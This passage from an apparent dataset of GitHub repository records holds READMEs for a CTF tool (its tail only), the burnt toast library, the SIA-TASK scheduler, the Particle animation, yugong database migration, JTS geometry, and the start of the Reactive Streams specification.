我在高二的时候参加了人生第一次ctf比赛,那时候被虐得体无完肤。当时我们留意到第一名在提交wp的时候也有这款工具的截图,让我非常开心。我希望这款工具能伴随各位ctfer的成长,如果有什么做得不够好的地方,欢迎大家在github的issue提供宝贵的意见,在力所能及的范围内我一定会采纳。
会一直坚持开源,也欢迎各位厂商继续采用我的工具作为新手必备的工具,感谢大家!
另外:米斯特安全团队一直在寻找优秀的CTF选手,如果有打算来我们团队发展的朋友可以联系邮箱:admin@hi-ourlife.com
## 旧版本
旧版本与新版本的差别仅仅在于ui的差别,最新的4.0版本抛弃了3.0被大家诟病的ui,并且在2.0也就是调查发现比较喜欢的版本的基础上进行了ui的美化,我认为旧版本已没有存在的必要,所以将项目设置为private,如果呼声过高我会重新开放。感谢大家。
~~[https://github.com/Acmesec/CTFCrackTools-V2](https://github.com/Acmesec/CTFCrackTools-V2)~~
## 要饭环节
我司承接各类安全培训以及渗透测试,可联系admin[#]hi-ourlife.com
![wechat](img/wechat.jpeg)
"
nandorojo/burnt,master,1028,31,2022-11-16T19:03:13Z,1463,9,Crunchy toasts for React Native. 🍞,,"# 🍞 burnt
Cross-platform toasts for React Native, powered by native elements.
- [Install](#installation)
- [Usage](#api)
Now with Android, iOS & Web Support.
## Alerts
https://user-images.githubusercontent.com/13172299/202289223-8a333223-3afa-49c4-a001-a70c76150ef0.mp4
## ...and Toasts
https://user-images.githubusercontent.com/13172299/231801324-3f0858a6-bd61-4d74-920f-4e77b80d26c1.mp4
## ...and Web Support
https://user-images.githubusercontent.com/13172299/236826405-b5f423bb-dafd-4013-a941-7accbea43c14.mp4
## Context
See this
[Twitter thread](https://twitter.com/FernandoTheRojo/status/1592923529644625920).
## What
This is a library with a `toast` and `alert` method for showing ephemeral UI.
On iOS, it wraps [`SPIndicator`](https://github.com/ivanvorobei/SPIndicator) and
[`AlertKit`](https://github.com/sparrowcode/AlertKit).
On Android, it wraps `ToastAndroid` from `react-native`. `Burnt.alert()` falls
back to `Burnt.toast()` on Android. This may change in a future version.
On Web, it wraps [`sonner`](https://github.com/emilkowalski/sonner) by Emil
Kowalski.
Burnt works with both the old & new architectures. It's built on top of JSI,
thanks to Expo's new module system.
## Features
- Simple, imperative `toast` that uses **native** components under the hood,
rather than using React state with JS-based UI.
- Animated icons
- iOS App Store-like `alert` popups
- Overlays on top of native iOS modals
- Loading alerts
## Modals
Displaying toasts on top of modals has always been an issue in React Native.
With Burnt, this works out of the box.
https://user-images.githubusercontent.com/13172299/231801096-2894fbf3-4df7-45d7-9c72-f80d36fd45ef.mp4
## Usage
```tsx
import * as Burnt from ""burnt"";
Burnt.toast({
title: ""Burnt installed."",
preset: ""done"",
message: ""See your downloads."",
});
```
You can also `Burnt.alert()` and `Burnt.dismissAllAlerts()`.
## TODO
- [x] iOS support
- [x] Android support
- [x] Custom iOS icons
- [x] Web support
## Installation
```sh
yarn add burnt
```
### Expo
Burnt likely requires Expo SDK 46+.
```sh
npx expo install burnt expo-build-properties
```
Add the `expo-build-properties` plugin to your `app.json`/`app.config.js`,
setting the deployment target to `13.0` (or higher):
```js
export default {
plugins: [
[
""expo-build-properties"",
{
ios: {
deploymentTarget: ""13.0"",
},
},
],
],
};
```
Then, you'll need to rebuild your dev client. Burnt will not work in Expo Go.
```sh
npx expo prebuild --clean
npx expo run:ios
```
The config plugin ensures that your iOS app has at least iOS 13 as a deployment
target, which is required for Burnt (as well as Expo SDK 47+).
### Web Support
To enable Web support, you need to add the `` to the root of your
app. If you're using Next.js, add this into your `_app.tsx` component.
```tsx
// _app.tsx
import { Toaster } from ""burnt/web"";
function MyApp({ Component, pageProps }) {
return (
<>
>
);
}
```
If you're using Next.js, add `burnt` to your `transpilePackages` in `next.config.js`.
```tsx
/** @type {import('next').NextConfig} */
const nextConfig = {
transpilePackages: [
// Your other packages here
""burnt""
]
}
```
To configure your `Toaster`, please reference the `sonner`
[docs](https://github.com/emilkowalski/sonner/tree/main#theme).
### Expo Web
If you're using Expo Web, you'll need to add the following to your
`metro.config.js` file:
```js
// Learn more https://docs.expo.io/guides/customizing-metro
const { getDefaultConfig } = require(""expo/metro-config"");
const config = getDefaultConfig(__dirname);
// --- burnt ---
config.resolver.sourceExts.push(""mjs"");
config.resolver.sourceExts.push(""cjs"");
// --- end burnt ---
module.exports = config;
```
### Plain React Native
```sh
pod install
```
### Solito
```sh
cd applications/app
expo install burnt expo-build-properties
npx expo prebuild --clean
npx expo run:ios
cd ../..
yarn
```
Be sure to also follow the [expo](#expo) instructions and [web](#web-support)
instructions.
## API
### `toast`
https://user-images.githubusercontent.com/13172299/202275423-300671e5-3918-4d5d-acae-0602160de252.mp4
`toast(options): Promise`
```tsx
Burnt.toast({
title: ""Congrats!"", // required
preset: ""done"", // or ""error"", ""none"", ""custom""
message: """", // optional
haptic: ""none"", // or ""success"", ""warning"", ""error""
duration: 2, // duration in seconds
shouldDismissByDrag: true,
from: ""bottom"", // ""top"" or ""bottom""
// optionally customize layout
layout: {
iconSize: {
height: 24,
width: 24,
},
},
icon: {
ios: {
// SF Symbol. For a full list, see https://developer.apple.com/sf-symbols/.
name: ""checkmark.seal"",
color: ""#1D9BF0"",
},
web: ,
},
});
```
### `alert`
https://user-images.githubusercontent.com/13172299/202275324-4f6cb5f5-a103-49b5-993f-2030fc836edb.mp4
_The API changed since recording this video. It now uses object syntax._
`alert(options): Promise`
```tsx
import * as Burnt from ""burnt"";
export const alert = () => {
Burnt.alert({
title: ""Congrats!"", // required
preset: ""done"", // or ""error"", ""heart"", ""custom""
message: """", // optional
duration: 2, // duration in seconds
// optionally customize layout
layout: {
iconSize: {
height: 24,
width: 24,
},
},
icon: {
ios: {
// SF Symbol. For a full list, see https://developer.apple.com/sf-symbols/.
name: ""checkmark.seal"",
color: ""#1D9BF0"",
},
web: ,
},
});
};
```
On Web, this will display a regular toast. This may change in the future.
### `dismissAllAlerts()`
Does what you think it does! In the future, I'll allow async spinners for
promises, and it'll be useful then.
## Contribute
```sh
yarn build
cd example
yarn
npx expo run:ios # do this again whenever you change native code
```
You can edit the iOS files in `ios/`, and then update the JS accordingly in
`src`.
## Thanks
Special thanks to [Tomasz Sapeta](https://twitter.com/tsapeta) for offering help
along the way.
Expo Modules made this so easy to build, and all with Swift – no Objective C.
It's my first time writing Swift, and it was truly a breeze.
"
siaorg/sia-task,master,1808,590,2019-05-15T03:23:47Z,83764,29,微服务任务调度框架,,"## 关于我们
* 邮件交流:sia.list@creditease.cn
* 提交issue:
* 微信交流:
微服务任务调度平台
===
[使用指南](USERSGUIDE.md)
[开发指南](DEVELOPGUIDE.md)
[部署指南](DEPLOY.md)
[Demo](FASTSTART.md)
背景
---
无论是互联网应用或者企业级应用,都充斥着大量的批处理任务。我们常常需要一些任务调度系统帮助我们解决问题。随着微服务化架构的逐步演进,单体架构逐渐演变为分布式、微服务架构。在此的背景下,很多原先的任务调度平台已经不能满足业务系统的需求。于是出现了一些基于分布式的任务调度平台。这些平台各有其特点,但各有不足之处,比如不支持任务编排、与业务高耦合、不支持跨平台等问题。不是非常符合公司的需求,因此我们开发了微服务任务调度平台(SIA-TASK)。
SIA是我们公司基础开发平台Simple is Awesome的简称,SIA-TASK(微服务任务调度平台)是其中的一项重要产品,SIA-TASK契合当前微服务架构模式,具有跨平台,可编排,高可用,无侵入,一致性,异步并行,动态扩展,实时监控等特点。
Introduction
---
A lot of batch tasks need to be processed by task scheduling systems. The single architectures are evolving towards distributed ones. We often need distributed task scheduling platforms to handle the needs of business systems. But such platforms may not support task scheduling across OS or are coupled with business features. We therefore decided to develop SIA-TASK.
SIA (Simple is Awesome) is our basic development platform. SIA-TASK is one of the key products of SIA and can work across OS. Its features include task scheduling, high availability, non-invasiveness, consistency, asynchronous concurrent processing, dynamic scale-out and real-time monitoring, etc.
项目简介
---
SIA-TASK是任务调度的一体式解决方案。对任务进行元数据采集,然后进行任务可视化编排,最终进行任务调度,并且对任务采取全流程监控,简单易用。对业务完全无侵入,通过简单灵活的配置即可生成符合预期的任务调度模型。
SIA-TASK借鉴微服务的设计思想,获取分布在每个任务执行器上的任务元数据,上传到任务注册中心。利用在线方式进行任务编排,可动态修改任务时钟,采用HTTP作为任务调度协议,统一使用JSON数据格式,由调度中心进行时钟解析,执行任务流程,进行任务通知。
Overview
---
SIA-TASK is an integrated non-invasive task scheduling solution. It collects task metadata and then visualizes and schedules the tasks. The scheduled tasks are monitored throughout the whole process. An ideal task scheduling model can be generated after simple and flexible configuration.
SIA-TASK collects task metadata on all executers and upload the data to the registry. The tasks are scheduled online using JSON with HTTP as the protocol. The scheduling center parses the clock, executes tasks and sends task notifications.
关键术语
---
* 任务(Task): 基本执行单元,执行器对外暴露的一个HTTP调用接口;
* 作业(Job): 由一个或者多个存在相互逻辑关系(串行/并行)的任务组成,任务调度中心调度的最小单位;
* 计划(Plan): 由若干个顺序执行的作业组成,每个作业都有自己的执行周期,计划没有执行周期;
* 任务调度中心(Scheduler): 根据每个的作业的执行周期进行调度,即按照计划、作业、任务的逻辑进行HTTP请求;
* 任务编排中心(Config): 编排中心使用任务来创建计划和作业;
* 任务执行器(Executer): 接收HTTP请求进行业务逻辑的执行;
* Hunter:Spring项目扩展包,负责执行器中的任务抓取,上传注册中心,业务可依赖该组件进行Task编写。
Terms
---
* Task: the basic execution unit and the HTTP call interface
* Job: the minimum scheduled unit that is composed of one or more (serial/concurrent) tasks
* Plan: the composition of several serial jobs with no execution cycle
* Scheduler: sends HTTP requests based on the logic of the plans, jobs and tasks
* Config: creates plans and jobs with tasks
* Executer: receives HTTP requests and executes the business logic
* Hunter: fetches tasks, uploads metadata and scripts business tasks
微服务任务调度平台的特性
---
* 基于注解自动抓取任务,在暴露成HTTP服务的方法上加入@OnlineTask注解,@OnlineTask会自动抓取方法所在的IP地址,端口,请求路径,请求方法,请求参数格式等信息上传到任务注册中心(zookeeper),并同步写入持久化存储中,此方法即任务;
* 基于注解无侵入多线程控制,单一任务实例必须保持单线程运行,任务调度框架自动拦截@OnlineTask注解进行单线程运行控制,保持在一个任务运行时不会被再次调度。而且整个控制过程对开发者完全无感知。
* 调度器自适应任务分配,任务执行过程中出现失败,异常时。可以根据任务定制的策略进行多点重新唤醒任务,保证任务的不间断执行。
* 高度灵活任务编排模式,SIA-TASK的设计思想是以任务为原子,把多个任务按照执行的关系组合起来形成一个作业。同时运行时分为任务调度中心和任务编排中心,使得作业的调度和作业的编排分隔开来,互不影响。在我们需要调整作业的流程时,只需要在编排中心进行处理即可。同时编排中心支持任务按照串行,并行,分支等方式组织关系。在相同任务不同任务实例时,也支持多种调度方式进行处理。
Features
---
* Annotation-based automatic task fetching. Add @OnlineTask to the HTTP method. @OnlineTask would fetch and upload the IP address, port, request path, and request parameter format to the registry (Zookeeper) while writing the information into the persistent storage.
* Annotation-based non-invasive multi-threading control. The scheduler automatically intercepts @OnlineTask for single-threading control and ensures that the running task would not be scheduled again. The whole process is non-invasive.
* Self-adaptive task scheduling. Tasks can be woken up based on the custom strategies when execution failure happens.
* Flexible task configuration. SIA-TASK is designed to group several logically related tasks into a job. The Scheduler and the Config schedules and configures jobs independently. The Config allows tasks to be organized in series, concurrently or as branches. Instances of the same task can be scheduled differently.
微服务任务调度平台设计
---
SIA-TASK主要分为五个部分:
* 任务执行器
* 任务调度中心
* 任务编排中心
* 任务注册中心(zookeeper)
* 持久存储(Mysql)
SIA-TASK includes the following components:
* Executer
* Scheduler
* Config
* Registry (Zookeeper)
* Persistent storage (MySQL)
![逻辑架构图](docs/images/sia_task1.png)
SIA-TASK的主要运行逻辑:
1. 通过注解抓取任务执行器中的任务上报到任务注册中心
2. 任务编排中心从任务注册中心获取数据进行编排保存入持久化存储
3. 任务调度中心从持久化存储获取调度信息
4. 任务调度中心按照调度逻辑访问任务执行器
SIA-TASK的主要运行逻辑:
1. Fetch and upload annotated tasks to the registry
2. The Config obtains data from the registry for scheduling and persistent storage
3. The Scheduler acquires data from the persistent storage
4. The Scheduler accesses the task scheduler following the scheduling logic
![逻辑架构图](docs/images/sia_task2.png)
UI预览
---
首页提供多维度监控
* 调度器信息:展示调度器信息(负载能力,预警值),以及作业分布情况。
* 调度信息:展示调度中心触发的调度次数,作业、任务多维度调度统计。
* 对接项目统计:对使用项目的系统进行统计,作业个数,任务个数等等。
Homepage
* Scheduler: loading capacity, alarm value and job distribution
* Scheduling: scheduling frequency, job metrics and task metrics
* Active users: job count and task count of active users
![首页](docs/images/index.png)
调度监控提供对已提交的作业进行实时监控展示
* 作业状态实时监控:以项目组为单位面板,展示作业运行时状态。
* 实时日志关联:可以通过涂色状态图标进行日志实时关联展示。
Scheduling Monitor: real-time monitoring over submitted jobs
* Real-time job monitoring: runtime metrics of jobs by project group
* Real-time log correlation: 可以通过涂色状态图标进行日志实时关联展示。
![调度监控](docs/images/scheduling-monitoring.png)
任务管理:提供任务元数据的相关操作
* 任务元数据录入:手动模式的任务,可在此进行录入。
* 任务连通性测试:提供任务连通性功能测试。
* 任务元数据其他操作:修改,删除。
Task Manager: task metadata operation
* Metadata entry: enter the metadata of manual tasks
* Connectivity test: test the connectivity of tasks
* Modification and deletion
![Task管理](docs/images/Task-management.png)
![Task管理](docs/images/user-handbook_taskMg5.png)
Job管理:提供作业相关操作
* 任务编排:进行作业的编排。
* 发布作业: 作业的创建,修改,以及发布。
* 级联设置:提供存在时间依赖的作业设置。
Job Manager: job operations
* Task configuration: configure jobs
* Job release: create, modify and release jobs
* Cascading setting: set time-dependent jobs
![Job管理](docs/images/Job-management.png)
日志管理
Log Manager
![Job管理](docs/images/user-handbook_log1.png)
开源地址
---
* [https://github.com/siaorg/sia-task](https://github.com/siaorg/sia-task)
## 其他说明
### 关于编译代码
* 建议使用Jdk1.8以上,JDK 1.8 or later version is recommended.
### 版本说明
* 建议版本1.0.0,SIA-TASK 1.0.0 is recommended.
### 版权说明
* 自身使用 Apache v2.0 协议,SIA-TASK uses Apache 2.0.
### 其他相关资料
## SIA相关开源产品链接:
+ [微服务路由网关](https://github.com/siaorg/sia-gateway)
+ [Rabbitmq队列服务PLUS](https://github.com/siaorg/sia-rabbitmq-plus)
(待补充)
"
JeasonWong/Particle,master,1415,169,2016-08-29T09:21:15Z,1722,8,It's a cool animation which can use in splash or somewhere else.,,"## What's Particle ?
It's a cool animation which can use in splash or anywhere else.
## Demo
![Markdown](https://raw.githubusercontent.com/jeasonwong/Particle/master/screenshots/particle.gif)
## Article
[手摸手教你用Canvas实现简单粒子动画](http://www.wangyuwei.me/2016/08/29/%E6%89%8B%E6%91%B8%E6%89%8B%E6%95%99%E4%BD%A0%E5%AE%9E%E7%8E%B0%E7%AE%80%E5%8D%95%E7%B2%92%E5%AD%90%E5%8A%A8%E7%94%BB/)
## Attributes
|name|format|description|中文解释
|:---:|:---:|:---:|:---:|
| pv_host_text | string |set left host text|设置左边主文案
| pv_host_text_size | dimension |set host text size|设置主文案的大小
| pv_particle_text | string |set right particle text|设置右边粒子上的文案
| pv_particle_text_size | dimension |set particle text size|设置粒子上文案的大小
| pv_text_color | color |set host text color|设置左边主文案颜色
|pv_background_color|color|set background color|设置背景颜色
| pv_text_anim_time | integer |set particle text duration|设置粒子上文案的运动时间
| pv_spread_anim_time | integer |set particle text spread duration|设置粒子上文案的伸展时间
|pv_host_text_anim_time|integer|set host text displacement duration|设置左边主文案的位移时间
## Usage
#### Define your banner under your xml :
```xml
```
#### Start animation :
```java
mParticleView.startAnim();
```
#### Add animation listener to listen the end callback :
```java
mParticleView.setOnParticleAnimListener(new ParticleView.ParticleAnimListener() {
@Override
public void onAnimationEnd() {
Toast.makeText(MainActivity.this, ""Animation is End"", Toast.LENGTH_SHORT).show();
}
});
```
## Import
Step 1. Add it in your project's build.gradle at the end of repositories:
```gradle
repositories {
maven {
url 'https://dl.bintray.com/wangyuwei/maven'
}
}
```
Step 2. Add the dependency:
```gradle
dependencies {
compile 'me.wangyuwei:ParticleView:1.0.4'
}
```
### About Me
[Weibo](http://weibo.com/WongYuwei)
[Blog](http://www.wangyuwei.me)
### QQ Group 欢迎讨论
**479729938**
##**License**
```license
Copyright [2016] [JeasonWong of copyright owner]
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
```"
alibaba/yugong,master,2480,953,2016-03-02T07:31:00Z,2415,102,"阿里巴巴去Oracle数据迁移同步工具(全量+增量,目标支持MySQL/DRDS)",,"## 背景
2008年,阿里巴巴开始尝试使用 MySQL 支撑其业务,开发了围绕 MySQL 相关的中间件和工具,Cobar/TDDL(目前为阿里云DRDS产品),解决了单机 Oracle 无法满足的扩展性问题,当时也掀起一股去IOE项目的浪潮,愚公这项目因此而诞生,其要解决的目标就是帮助用户完成从 Oracle 数据迁移到 MySQL 上,完成去 IOE 的重要一步工作。
## 项目介绍
名称: yugong
译意: 愚公移山
语言: 纯java开发
定位: 数据库迁移 (目前主要支持oracle / mysql / DRDS)
## 项目介绍
整个数据迁移过程,分为两部分:
1. 全量迁移
2. 增量迁移
![](https://camo.githubusercontent.com/9a9cc09c5a7598239da20433857be61c54481b9c/687474703a2f2f646c322e69746579652e636f6d2f75706c6f61642f6174746163686d656e742f303131352f343531312f31306334666134632d626634342d333165352d623531312d6231393736643164373636392e706e67)
过程描述:
1. 增量数据收集 (创建oracle表的增量物化视图)
2. 进行全量复制
3. 进行增量复制 (可并行进行数据校验)
4. 原库停写,切到新库
## 架构
![](http://dl2.iteye.com/upload/attachment/0115/5473/8532d838-d4b2-371b-af9f-829d4127b1b8.png){width=""584""
height=""206""}
说明:
1. 一个Jvm Container对应多个instance,每个instance对应于一张表的迁移任务
2. instance分为三部分
a. extractor (从源数据库上提取数据,可分为全量/增量实现)
b. translator (将源库上的数据按照目标库的需求进行自定义转化)
c. applier (将数据更新到目标库,可分为全量/增量/对比的实现)
## 方案设计
[DevDesign](https://github.com/alibaba/yugong/wiki/DevDesign)
## 快速开始
[QuickStart](https://github.com/alibaba/yugong/wiki/QuickStart)
## 运维管理
[AdminGuide](https://github.com/alibaba/yugong/wiki/AdminGuide)
## 性能报告
[Performance](https://github.com/alibaba/yugong/wiki/Performance)
## 相关资料
1. yugong简单介绍ppt: [ppt](https://github.com/alibaba/yugong/blob/master/docs/yugong_Intro.ppt?raw=true)
2. [分布式关系型数据库服务DRDS](https://www.aliyun.com/product/drds)
(前身为阿里巴巴公司的Cobar/TDDL的演进版本, 基本原理为MySQL分库分表)
## 沟通与交流
1. 详见 wiki home 页
"
locationtech/jts,master,1855,423,2016-01-25T18:08:41Z,40590,199,The JTS Topology Suite is a Java library for creating and manipulating vector geometry.,computational-geometry geometric-algorithms geometry geometry-algorithms geometry-library gis java java-library jts jts-topology-suite ogc ogc-wkt triangulation voronoi,"JTS Topology Suite
==================
The JTS Topology Suite is a Java library for creating and manipulating vector geometry. It also provides a comprehensive set of geometry test cases, and the TestBuilder GUI application for working with and visualizing geometry and JTS functions.
![JTS logo](jts_logo.png)
[![Travis Build Status](https://api.travis-ci.org/locationtech/jts.svg)](http://travis-ci.org/locationtech/jts) [![GitHub Action Status](https://github.com/locationtech/jts/workflows/GitHub%20CI/badge.svg)](https://github.com/locationtech/jts/actions)
[![Join the chat at https://gitter.im/locationtech/jts](https://badges.gitter.im/locationtech/jts.svg)](https://gitter.im/locationtech/jts?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
JTS is a project in the [LocationTech](http://www.locationtech.org) working group of the Eclipse Foundation.
![LocationTech](locationtech_mark.png)
## Requirements
Currently JTS targets Java 1.8 and above.
## Resources
### Code
* [GitHub Repo](https://github.com/locationtech/jts)
* [Maven Central group](https://mvnrepository.com/artifact/org.locationtech.jts)
### Websites
* [LocationTech Home](https://locationtech.org/projects/technology.jts)
* [GitHub web site](https://locationtech.github.io/jts/)
### Communication
* [Mailing List](https://accounts.eclipse.org/mailing-list/jts-dev)
* [Gitter Channel](https://gitter.im/locationtech/jts)
### Forums
* [Stack Overflow](https://stackoverflow.com/questions/tagged/jts)
* [GIS Stack Exchange](https://gis.stackexchange.com/questions/tagged/jts-topology-suite)
## License
JTS is open source software. It is dual-licensed under:
* [Eclipse Public License 2.0](https://www.eclipse.org/legal/epl-v20.html)
* [Eclipse Distribution License 1.0](http://www.eclipse.org/org/documents/edl-v10.php) (a BSD Style License)
See also:
* [License details](LICENSES.md)
* Licensing [FAQ](FAQ-LICENSING.md)
## Documentation
* [**Javadoc**](https://locationtech.github.io/jts/javadoc) for the latest version of JTS
* [**FAQ**](https://locationtech.github.io/jts/jts-faq.html) - Frequently Asked Questions
* [**User Guide**](USING.md) - Installing and using JTS
* [**Tools**](doc/TOOLS.md) - Guide to tools included with JTS
* [**Developing Guide**](DEVELOPING.md) - how to build and develop for JTS
* [**Upgrade Guide**](MIGRATION.md) - How to migrate from previous versions of JTS
## History
* [**Version History**](https://github.com/locationtech/jts/blob/master/doc/JTS_Version_History.md)
* History from the previous JTS SourceForge repo is in the branch [`_old/history`](https://github.com/locationtech/jts/tree/_old/history)
* Older versions of JTS can be found on SourceForge
* There is an archive of distros of older versions [here](https://github.com/dr-jts/jts-versions)
## Contributing
If you are interested in contributing to JTS please read the [**Contributing Guide**](CONTRIBUTING.md).
## Downstream Projects
### Derivatives (ports to other languages)
* [**GEOS**](https://trac.osgeo.org/geos) - C++
* [**NetTopologySuite**](https://github.com/NetTopologySuite/NetTopologySuite) - .NET
* [**JSTS**](https://github.com/bjornharrtell/jsts) - JavaScript
* [**dart_jts**](https://github.com/moovida/dart_jts) - Dart
### Via GEOS
* [**Shapely**](https://github.com/Toblerity/Shapely) - Python wrapper of GEOS
* [**R-GEOS**](https://cran.r-project.org/web/packages/rgeos/index.html) - R wrapper of GEOS
* [**rgeo**](https://github.com/rgeo/rgeo) - Ruby wrapper of GEOS
* [**GEOSwift**](https://github.com/GEOSwift/GEOSwift)- Swift library using GEOS
There are many projects using GEOS - for a list see the [GEOS wiki](https://trac.osgeo.org/geos/wiki/Applications).
"
reactive-streams/reactive-streams-jvm,master,4744,521,2014-02-28T13:16:15Z,1846,28,Reactive Streams Specification for the JVM,,"# Reactive Streams #
The purpose of Reactive Streams is to provide a standard for asynchronous stream processing with non-blocking backpressure.
The latest release is available on Maven Central as
```xml
org.reactivestreamsreactive-streams1.0.4org.reactivestreamsreactive-streams-tck1.0.4test
```
## Goals, Design and Scope ##
Handling streams of data—especially “live” data whose volume is not predetermined—requires special care in an asynchronous system. The most prominent issue is that resource consumption needs to be carefully controlled such that a fast data source does not overwhelm the stream destination. Asynchrony is needed in order to enable the parallel use of computing resources, on collaborating network hosts or multiple CPU cores within a single machine.
The main goal of Reactive Streams is to govern the exchange of stream data across an asynchronous boundary – think passing elements on to another thread or thread-pool — while ensuring that the receiving side is not forced to buffer arbitrary amounts of data. In other words, backpressure is an integral part of this model in order to allow the queues which mediate between threads to be bounded. The benefits of asynchronous processing would be negated if the backpressure signals were synchronous (see also the [Reactive Manifesto](http://reactivemanifesto.org/)), therefore care has been taken to mandate fully non-blocking and asynchronous behavior of all aspects of a Reactive Streams implementation.
It is the intention of this specification to allow the creation of many conforming implementations, which by virtue of abiding by the rules will be able to interoperate smoothly, preserving the aforementioned benefits and characteristics across the whole processing graph of a stream application.
It should be noted that the precise nature of stream manipulations (transformation, splitting, merging, etc.) is not covered by this specification. Reactive Streams are only concerned with mediating the stream of data between different [API Components](#api-components). In their development care has been taken to ensure that all basic ways of combining streams can be expressed.
In summary, Reactive Streams is a standard and specification for Stream-oriented libraries for the JVM that
- process a potentially unbounded number of elements
- in sequence,
- asynchronously passing elements between components,
- with mandatory non-blocking backpressure.
The Reactive Streams specification consists of the following parts:
***The API*** specifies the types to implement Reactive Streams and achieve interoperability between different implementations.
***The Technology Compatibility Kit (TCK)*** is a standard test suite for conformance testing of implementations.
Implementations are free to implement additional features not covered by the specification as long as they conform to the API requirements and pass the tests in the TCK.
### API Components ###
The API consists of the following components that are required to be provided by Reactive Stream implementations:
1. Publisher
2. Subscriber
3. Subscription
4. Processor
A *Publisher* is a provider of a potentially unbounded number of sequenced elements, publishing them according to the demand received from its Subscriber(s).
In response to a call to `Publisher.subscribe(Subscriber)` the possible invocation sequences for methods on the `Subscriber` are given by the following protocol:
```
onSubscribe onNext* (onError | onComplete)?
```
This means that `onSubscribe` is always signalled,
followed by a possibly unbounded number of `onNext` signals (as requested by `Subscriber`) followed by an `onError` signal if there is a failure, or an `onComplete` signal when no more elements are available—all as long as the `Subscription` is not cancelled.
#### NOTES
- The specifications below use binding words in capital letters from https://www.ietf.org/rfc/rfc2119.txt
### Glossary
| Term | Definition |
| ------------------------- | ------------------------------------------------------------------------------------------------------ |
| Signal | As a noun: one of the `onSubscribe`, `onNext`, `onComplete`, `onError`, `request(n)` or `cancel` methods. As a verb: calling/invoking a signal. |
| Demand | As a noun, the aggregated number of elements requested by a Subscriber which is yet to be delivered (fulfilled) by the Publisher. As a verb, the act of `request`-ing more elements. |
| Synchronous(ly) | Executes on the calling Thread. |
| Return normally | Only ever returns a value of the declared type to the caller. The only legal way to signal failure to a `Subscriber` is via the `onError` method.|
| Responsivity | Readiness/ability to respond. In this document used to indicate that the different components should not impair each others ability to respond. |
| Non-obstructing | Quality describing a method which is as quick to execute as possible—on the calling thread. This means, for example, avoids heavy computations and other things that would stall the caller´s thread of execution. |
| Terminal state | For a Publisher: When `onComplete` or `onError` has been signalled. For a Subscriber: When an `onComplete` or `onError` has been received.|
| NOP | Execution that has no detectable effect to the calling thread, and can as such safely be called any number of times.|
| Serial(ly) | In the context of a [Signal](#term_signal), non-overlapping. In the context of the JVM, calls to methods on an object are serial if and only if there is a happens-before relationship between those calls (implying also that the calls do not overlap). When the calls are performed asynchronously, coordination to establish the happens-before relationship is to be implemented using techniques such as, but not limited to, atomics, monitors, or locks. |
| Thread-safe | Can be safely invoked synchronously, or asychronously, without requiring external synchronization to ensure program correctness. |
### SPECIFICATION
#### 1. Publisher ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Publisher.java))
```java
public interface Publisher {
public void subscribe(Subscriber super T> s);
}
````
| ID | Rule |
| ------------------------- | ------------------------------------------------------------------------------------------------------ |
| 1 | The total number of `onNext`´s signalled by a `Publisher` to a `Subscriber` MUST be less than or equal to the total number of elements requested by that `Subscriber`´s `Subscription` at all times. |
| [:bulb:](#1.1 ""1.1 explained"") | *The intent of this rule is to make it clear that Publishers cannot signal more elements than Subscribers have requested. There’s an implicit, but important, consequence to this rule: Since demand can only be fulfilled after it has been received, there’s a happens-before relationship between requesting elements and receiving elements.* |
| 2 | A `Publisher` MAY signal fewer `onNext` than requested and terminate the `Subscription` by calling `onComplete` or `onError`. |
| [:bulb:](#1.2 ""1.2 explained"") | *The intent of this rule is to make it clear that a Publisher cannot guarantee that it will be able to produce the number of elements requested; it simply might not be able to produce them all; it may be in a failed state; it may be empty or otherwise already completed.* |
| 3 | `onSubscribe`, `onNext`, `onError` and `onComplete` signaled to a `Subscriber` MUST be signaled [serially](#term_serially). |
| [:bulb:](#1.3 ""1.3 explained"") | *The intent of this rule is to permit the signalling of signals (including from multiple threads) if and only if a happens-before relation between each of the signals is established.* |
| 4 | If a `Publisher` fails it MUST signal an `onError`. |
| [:bulb:](#1.4 ""1.4 explained"") | *The intent of this rule is to make it clear that a Publisher is responsible for notifying its Subscribers if it detects that it cannot proceed—Subscribers must be given a chance to clean up resources or otherwise deal with the Publisher´s failures.* |
| 5 | If a `Publisher` terminates successfully (finite stream) it MUST signal an `onComplete`. |
| [:bulb:](#1.5 ""1.5 explained"") | *The intent of this rule is to make it clear that a Publisher is responsible for notifying its Subscribers that it has reached a [terminal state](#term_terminal_state)—Subscribers can then act on this information; clean up resources, etc.* |
| 6 | If a `Publisher` signals either `onError` or `onComplete` on a `Subscriber`, that `Subscriber`’s `Subscription` MUST be considered cancelled. |
| [:bulb:](#1.6 ""1.6 explained"") | *The intent of this rule is to make sure that a Subscription is treated the same no matter if it was cancelled, the Publisher signalled onError or onComplete.* |
| 7 | Once a [terminal state](#term_terminal_state) has been signaled (`onError`, `onComplete`) it is REQUIRED that no further signals occur. |
| [:bulb:](#1.7 ""1.7 explained"") | *The intent of this rule is to make sure that onError and onComplete are the final states of an interaction between a Publisher and Subscriber pair.* |
| 8 | If a `Subscription` is cancelled its `Subscriber` MUST eventually stop being signaled. |
| [:bulb:](#1.8 ""1.8 explained"") | *The intent of this rule is to make sure that Publishers respect a Subscriber’s request to cancel a Subscription when Subscription.cancel() has been called. The reason for **eventually** is because signals can have propagation delay due to being asynchronous.* |
| 9 | `Publisher.subscribe` MUST call `onSubscribe` on the provided `Subscriber` prior to any other signals to that `Subscriber` and MUST [return normally](#term_return_normally), except when the provided `Subscriber` is `null` in which case it MUST throw a `java.lang.NullPointerException` to the caller, for all other situations the only legal way to signal failure (or reject the `Subscriber`) is by calling `onError` (after calling `onSubscribe`). |
| [:bulb:](#1.9 ""1.9 explained"") | *The intent of this rule is to make sure that `onSubscribe` is always signalled before any of the other signals, so that initialization logic can be executed by the Subscriber when the signal is received. Also `onSubscribe` MUST only be called at most once, [see [2.12](#2.12)]. If the supplied `Subscriber` is `null`, there is nowhere else to signal this but to the caller, which means a `java.lang.NullPointerException` must be thrown. Examples of possible situations: A stateful Publisher can be overwhelmed, bounded by a finite number of underlying resources, exhausted, or in a [terminal state](#term_terminal_state).* |
